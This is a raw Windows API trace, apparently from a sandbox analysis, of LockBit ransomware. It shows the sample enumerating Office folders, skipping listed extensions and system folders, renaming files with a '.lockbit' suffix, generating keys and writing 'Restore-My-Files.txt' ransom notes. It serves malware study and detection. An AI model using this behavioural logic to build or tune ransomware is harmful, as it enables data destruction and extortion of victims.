[0199.580] lstrcmpiW (lpString1=".", lpString2="OFFICE10.MML") returned -1 [0199.580] lstrcmpiW (lpString1="..", lpString2="OFFICE10.MML") returned -1 [0199.580] PathFindExtensionW (pszPath="OFFICE10.MML") returned=".MML" [0199.580] lstrcmpiW (lpString1=".386", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".cmd", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".exe", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".ani", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".adv", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".theme", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".msi", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".msp", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".com", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".diagpkg", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".nls", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".diagcab", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".lock", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".ocx", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".mpa", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".cpl", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".mod", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".hta", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".icns", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".prf", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".rtp", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".diagcfg", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".msstyles", lpString2=".MML") returned 1 [0199.581] lstrcmpiW (lpString1=".bin", lpString2=".MML") returned -1 [0199.581] lstrcmpiW (lpString1=".hlp", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".shs", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".drv", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".wpx", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".bat", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".rom", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".msc", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".spl", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".ps1", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".msu", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".ics", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".key", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".mp3", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".reg", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".dll", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".ini", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".idx", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".sys", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".hlp", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".ico", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".lnk", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1=".rdp", lpString2=".MML") returned 1 [0199.582] lstrcmpiW (lpString1=".lockbit", lpString2=".MML") returned -1 [0199.582] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="OFFICE10.MML") returned 1 [0199.582] lstrcmpiW (lpString1="ntldr", lpString2="OFFICE10.MML") returned -1 [0199.583] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="OFFICE10.MML") returned -1 [0199.583] lstrcmpiW (lpString1="bootsect.bak", lpString2="OFFICE10.MML") returned -1 [0199.583] lstrcmpiW (lpString1="autorun.inf", lpString2="OFFICE10.MML") returned -1 [0199.583] lstrcmpiW (lpString1="thumbs.db", lpString2="OFFICE10.MML") returned 1 [0199.583] lstrcmpiW (lpString1="iconcache.db", lpString2="OFFICE10.MML") returned -1 [0199.583] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\") returned="" [0199.583] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned=".MML" [0199.583] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0199.583] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0199.583] lstrcmpiW (lpString1=".7z", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".ckp", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".dacpac", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".db", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".db-shm", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".db-wal", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".db3", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".dbc", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".dbs", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".dbt", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".dbv", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".frm", lpString2=".MML") returned -1 [0199.583] lstrcmpiW (lpString1=".mdf", lpString2=".MML") returned -1 [0199.584] lstrcmpiW (lpString1=".mrg", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".mwb", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".myd", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".ndf", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".qry", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".sdb", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".sdf", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".sql", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".sqlite", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".sqlite3", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MML") returned 1 [0199.584] lstrcmpiW (lpString1=".tmd", lpString2=".MML") returned 1 [0199.584] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.lockbit") returned 75 [0199.584] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.586] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.586] malloc (_Size=0x40068) returned 0x3f70048 [0199.586] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=312376) returned 1 [0199.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.587] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.590] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.590] malloc (_Size=0xac) returned 0x1fa2ed8 [0199.590] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xac, FileInformationClass=0xa) returned 0x0 [0199.592] free (_Block=0x1fa2ed8) [0199.592] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned 1 [0199.592] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Restore-My-Files.txt") returned 75 [0199.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.593] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.593] malloc (_Size=0x40068) returned 0x3e70008 [0199.593] WriteFile (in: hFile=0x330, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0199.595] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c438, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MML", cAlternateFileName="")) returned 0 [0199.595] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0199.595] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP", cAlternateFileName="")) returned 1 [0199.595] lstrcmpiW (lpString1=".", lpString2="AUTOSHAP") returned -1 [0199.595] lstrcmpiW (lpString1="..", lpString2="AUTOSHAP") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="$windows.~bt") returned 1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="intel") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="msocache") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="$recycle.bin") returned 1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="$windows.~ws") returned 1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="tor browser") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="boot") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="system volume information") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="perflogs") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="google") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="application data") returned 1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="windows") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="windows.old") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="appdata") returned 1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="Windows nt") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="Msbuild") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="Microsoft") returned -1 [0199.596] lstrcmpiW (lpString1="AUTOSHAP", lpString2="All users") returned 1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="mozilla") returned -1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="Microsoft.NET") returned -1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="microsoft shared") returned -1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="Internet Explorer") returned -1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="common files") returned -1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="opera") returned -1 [0199.597] lstrcmpiW (lpString1="AUTOSHAP", lpString2="Windows Journal") returned -1 [0199.597] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 58 [0199.597] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*") returned 60 [0199.597] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0199.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0199.641] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.642] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0199.642] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0199.642] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP.DLL", cAlternateFileName="")) returned 1 [0199.642] lstrcmpiW (lpString1=".", lpString2="AUTOSHAP.DLL") returned -1 [0199.642] lstrcmpiW (lpString1="..", lpString2="AUTOSHAP.DLL") returned -1 [0199.642] PathFindExtensionW (pszPath="AUTOSHAP.DLL") returned=".DLL" [0199.642] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0199.642] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0199.642] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0199.642] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0199.642] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0199.642] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0199.642] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0199.642] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0199.642] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0199.643] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0199.643] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0199.644] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0199.644] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0199.644] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6154e300, ftCreationTime.dwHighDateTime=0x1bdcf23, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6154e300, ftLastWriteTime.dwHighDateTime=0x1bdcf23, nFileSizeHigh=0x0, nFileSizeLow=0x926, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18180_.WMF", cAlternateFileName="")) returned 1 [0199.644] lstrcmpiW (lpString1=".", lpString2="BD18180_.WMF") returned -1 [0199.644] lstrcmpiW (lpString1="..", lpString2="BD18180_.WMF") returned -1 [0199.644] PathFindExtensionW (pszPath="BD18180_.WMF") returned=".WMF" [0199.644] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.644] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.645] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.645] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.646] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18180_.WMF") returned 1 [0199.646] lstrcmpiW (lpString1="ntldr", lpString2="BD18180_.WMF") returned 1 [0199.646] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18180_.WMF") returned 1 [0199.646] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18180_.WMF") returned 1 [0199.646] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18180_.WMF") returned -1 [0199.646] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18180_.WMF") returned 1 [0199.646] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18180_.WMF") returned 1 [0199.646] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.646] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF") returned=".WMF" [0199.646] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.647] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.647] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.647] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF.lockbit") returned 79 [0199.648] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18180_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18180_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.657] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.657] malloc (_Size=0x40068) returned 0x3df0008 [0199.657] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2342) returned 1 [0199.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.658] BCryptGenRandom (in: 